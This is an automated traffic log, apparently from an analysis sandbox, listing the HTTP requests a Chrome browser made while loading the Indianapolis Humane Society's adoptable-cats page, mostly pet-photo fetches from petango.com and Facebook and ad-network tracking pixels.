Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387965322&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=ssc&google_hm=SYScIzQoRVihlt4vcJdW7Gd_LXU HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmgi_KaV_vmCIXRWAviJHfF6XtRvGpgrnd-sNzLOh9Yn-8cB-EiNAq9VlvF
Source: global trafficHTTP traffic detected: GET /photos/352/0bc6f3ec-9651-4981-852c-606c251e94f3.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/c69de645-3962-47b9-80d8-eb755719f1b7.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/f5d5ba8d-c5e9-485f-8040-a2ad6fa39444.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/42822d30-5fc7-4b46-8640-effba9e4ddde.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/41def0ce-c879-4f21-84bd-6c08bd8d9580.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?cc=1&id=537072977&val=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=083d9128-a88d-464c-a2e4-d0081c094869|1736387966
Source: global trafficHTTP traffic detected: GET /photos/352/1c1820a3-ebd4-4ae2-bd1e-da7502e4eee4.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/e814d785-2335-404a-8a20-0cb3ae2c5441.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387965322&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387966445&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387966445&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d82a13a6-1fba-467c-a8e3-f64f576f7c02.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a66346fd-1c41-4492-b9c9-20a54b4e16d2.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/5e3cc503-736f-4a0b-899b-1bef3d36f827.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/992893bc-1286-43f9-9f38-1674ef2cec80.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387965322&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D133%26code%3D49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: uuid2=3411804901976268155; anj=dTM7k!M4/0Erk#WF']wIg2Illqi/$c!]tbPl@/TUQg5)KgO1[QdWj7dfF:)Le8p=xe:6>)5uu#$=O.=N1-cTdigRB)50NTXlh[m3eWAKIjG?zQn?btHbDjKL!_6-zQEVk`!0IO-Q$`QY
Source: global trafficHTTP traffic detected: GET /photos/352/26812b91-7e9f-4bee-913c-af37d8f79f54.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d448be62-5a8d-43eb-bb05-207e8e527e20.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/41def0ce-c879-4f21-84bd-6c08bd8d9580.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/46805e49-ef7b-4349-8a04-2f19534614d8.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/c69de645-3962-47b9-80d8-eb755719f1b7.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/048ac518-b094-424d-a5c8-fbbf4ace67ca.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/18b604e0-a421-4694-95bd-2dcc1c1b56dd.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/1c1820a3-ebd4-4ae2-bd1e-da7502e4eee4.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387966445&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387966445&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/ee1a5486-3cd8-45f1-ac23-a1101b1ab628.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d82a13a6-1fba-467c-a8e3-f64f576f7c02.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/5e3cc503-736f-4a0b-899b-1bef3d36f827.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/048ac518-b094-424d-a5c8-fbbf4ace67ca.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d448be62-5a8d-43eb-bb05-207e8e527e20.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/18b604e0-a421-4694-95bd-2dcc1c1b56dd.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/46805e49-ef7b-4349-8a04-2f19534614d8.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/ee1a5486-3cd8-45f1-ac23-a1101b1ab628.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973167&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973167&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source=navigation-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
